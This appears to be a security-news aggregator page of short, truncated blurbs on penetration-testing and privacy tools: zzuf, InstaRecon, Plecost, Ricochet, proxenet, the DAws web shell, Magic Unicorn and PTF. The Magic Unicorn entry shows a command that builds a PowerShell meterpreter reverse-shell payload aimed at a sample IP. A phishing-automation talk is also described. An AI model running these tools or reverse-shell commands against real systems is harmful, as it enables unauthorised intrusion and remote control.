zzuf is a transparent application input fuzzer. Its purpose is to find bugs in applications by corrupting their user-contributed data (which more than often comes from untrusted sources on the Internet). It works by intercepting file and network operations and changing random bits in the program’s input. zzuf’s behaviour is deterministic, making it easier to reproduce bugs. Its main areas of use are:quality assurance: use zzuf to test existing software, or integrate it into your own software’s testsuite security: very often, segmentation faults or memory corruption issues mean a potential security hole, zzuf helps exposing some of them code coverage analysis: use zzuf to maximise code coverage
zzuf’s primary target is media players, image viewers and web browsers, because the data they process is inherently insecure, but it was also successfully used to find bugs in system utilities such as objdump.
zzuf is not rocket science: the idea of fuzzing input data is barely new, but zzuf’s main purpose is to make things easier and automated.Documentation
The zzuf tutorial is a hands-on guide to the most important zzuf features. It starts with the working principles but goes on with very advanced uses of the tool.
Warning: this tutorial requires zzuf version 0.11 or later.Basic zzuf usage 1.1. Launching zzuf 1.2. Invoking different programs 1.3. The fuzzing ratio 1.4. The random seed 1.5. Creating fuzzed [...]
Great for getting an initial footprint of your targets and discovering additional subdomains. InstaRecon will do:DNS (direct, PTR, MX, NS) lookups Whois (domains and IP) lookups Google dorks in search of subdomains Shodan lookups Reverse DNS lookups on entire CIDRs
…all printed nicely on your console or csv file.
InstaRecon will never scan a target directly. Information is retrieved from DNS/Whois servers, Google, and Shodan.
Installing with pip
Simply install dependencies using pip. Tested on Ubuntu 14.04 and Kali Linux 1.1.0a.pip install -r requirements.txt
orpip install pythonwhois ipwhois ipaddress shodan
Example$ ./instarecon.py -s <shodan_key> -o ~/Desktop/github.com.csv github.com # InstaRecon v0.1 - by Luis Teixeira (teix.co) # Scanning 1/1 hosts # Shodan key provided - <shodan_key>
Source && Download
Plecost is a vulnerability fingerprinting and vulnerability finder for WordPress blog engine
There are a huge number of WordPress around the world. Most of them are exposed to be attacked and be converted into a virus, malware or illegal porn provider, without the knowledge of the blog owner.
This project try to help sysadmins and blog’s owners to make a bit secure their WordPress.
Install Plecost is so easy:$ python3 -m pip install plecost
Remember that Plecost3 only runs in Python 3.
Scan a web site si so simple:$ plecost http://SITE.com
A bit complex scan: increasing verbosity exporting results in JSON format and XML:
JSON$ plecost -v http://SITE.com -o results.json
$ plecost -v http://SITE.com -o results.xml
Advanced scan options
No check WordPress version, only for plugins:$ plecost -nc http://SITE.com
Force scan, even if not WordPress was detected:$ plecost -f http://SITE.com
Display only the short banner:$ plecost -nb http://SITE.com
List available wordlists:$ plecost -nb -l// Plecost - WordPress finger printer Tool - v1.0.0Available word lists: 1 - plugin_list_10.txt 2 - plugin_list_100.txt 3 - plugin_list_1000.txt 4 - plugin_list_250.txt 5 - plugin_list_50.txt 6 - [...]
BitTorrent’s peer-to-peer private voice and text app Bleep is finally available for curious Windows, Mac, iOS and Android users to test it out
The app offers end-to-end encryption of all communication (calls are connected directly), and you don’t have to pay to use it. You also don’t have to provide any information about yourself in order to use it – a random nickname is enough, and a Bleep key will be created to identify the device for other users to be able to contact you. Bleep got its name from the fact that the company does not see the metadata or the contents of the exchanged messages.
Unlike traditional messaging services, where a chat app establishes a Session Initiation Protocol (SIP) connection with a central server app, Bleep does the same with a distributed server app.
This means that there is no central central repository of metadata – not because the company does not store it, but because they never have it. It also means that the person who wants to talk with someone must go search for them through nodes (and this search is also not tracked.
There are two main components to its architecture:
New peer-to-peer platform for communications; think of it as a fully distributed SIP (Session Initiation Protocol) server which [...]
Anonymous metadata-resistant instant messaging that just works
Ricochet is an experiment with a different kind of instant messaging that doesn’t trust anyone with your identity, your contact list, or your communications.You can chat without exposing your identity (or IP address) to anyone Nobody can discover who your contacts are or when you talk (metadata-free!) There are no servers or operators to compromise that could access your information It’s cross-platform and easy for non-technical users
How it works
Ricochet is a peer-to-peer instant messaging system built on Tor hidden services. Your login is your hidden service address, and contacts connect to you (not an intermediate server) through Tor. The rendezvous system makes it extremely hard for anyone to learn your identity from your address.
Ricochet is not affiliated with or endorsed by The Tor Project
Technical design of Ricochet
Ricochet is an instant messaging system designed around Tor hidden services. This document describes the goals and design of that system from a technical perspective. The reader should be familiar with Tor and hidden services.
Goals for the project
To implement a real-time messaging system with these properties:Users aren’t personally identifiable by contacts or their [...]
Advanced Web Shell: DAws – 22/5/2015 – Release
Source && Download
proxenet is a multi-threaded proxy which allows you to manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenet supports heaps of languages and more can be added easily. proxenet is a C-based proxy which allows you to interact with higher level languages and perform on-the-fly modification of requests/responses sent by your Web browser.
proxenet is not script kiddie friendly, neither GUI friendly.
If this is what you are looking for, here are a few links for youZAP Burp ProxyStrike
Or the best way, write your own GUI as a proxenet plugin !
Why use DIY Web Proxy ?
The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only few proxies supports adding ( or extending proxy capabilities with ) new extensions. When they do support scripting, they usually support only limited set of languages and in many cases only one – despite Burp persistent attempts to make unnatural bindings (Python over Java or worse Ruby over Java).
Being written in pure C, proxynet is very fast, efficient and easily pluggable to anything else. It is THE ultimate DIY web proxy for pentesters.
Features:Written in CFast (heavy thread [...]
The Kentuckiana ISSA Chapter is hosting its 3rd annual information security workshop. This event is available for a donation to a great cause. The class will benefit Johnny Long and his family in their mission to support Hackers for Charity full-time in Uganda, Africa. Hackers for Charity is a non-profit organization that leverages the skills of technologists to solve technology challenges for various non-profits and provide food, equipment, job training and computer education to the world’s poorest citizens.
TopicsPassword Hash Usage Capturing Passwords with Cain, Metasploit and other tools Cracking Password Hashes with John the Ripper and Hashcat Other Topics
Martin “Pure Hate” Bos (@purehate_) works as a penetration tester for Accuvant Inc., is globally recognized leader in password analysis and is a core developer of Backtrack- and Kali-Linux. Additionally he is a co-Founder of Question-Defense.com, a website dedicated to answering technical questions daily with the largest online WPA Cracking service on the web, and one of the founders of DerbyCon, a hacker con located in Louisville, Kentucky. He resides in Louisville, KY with his wife, Kim and their daughter.
Adrian “Irongeek” Crenshaw (@irongeek_adc) has worked in the IT industry for the last seventeen years. He runs the information [...]
The challenges with cyber security, and cyber warfare in particular are complicated by the attributes of a cyber “battlespace”. The data sets that represent the values of speed, size and complexity of the cyber landscape are far beyond the capability of human beings to comprehend in a working environment. As the velocity, variety and volume of cyber data increases, the ability of humans to effectively process situational awareness, impacts, tactics and actions will effectively decrease. Many of the current tools for cyber security present ridiculous cognitive load issues for the users and inhibit thinking (even if the additional load is subconscious) and decision-making. This presentation posits that a specialized variant of user-centered design that focuses on augmenting human performance in data-intensive domains, will be critical for cyber security professionals. The process and necessity of user-centered design to enable system-supported decision making (also called decision-advantage) will be discussed as well as examples of industries successfully solving the problem from multi-player gaming, design thinking and data sciences fields.
Phishing is one of the few attack vectors that has become more prevalent over time. This presentation will explore common phishing attack tools and techniques. Additionally, we will be demoing a new tool which will assist penetration testers in quickly deploying phishing exercises in minimal time. The tool, when provided minimal input (just a domain name), can automatically search for potential targets, deploy multiple phishing websites, craft and send phishing emails to the targets, record the results, and generate a report. It will work in a stand alone fashion or make use of external tools (such as theHarvester, Recon-NG, SET, and Metasploit) if available.
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.
root@bt:~/Desktop# python unicorn.py
Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.
Usage: python unicorn.py payload reverse_ipaddr port
Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a [...]
The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we’ve been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those “go to” tools that we use on a regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It’s all up to you.
The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It’s super simple to configure and add them and only takes a few minute.
First check out the [...]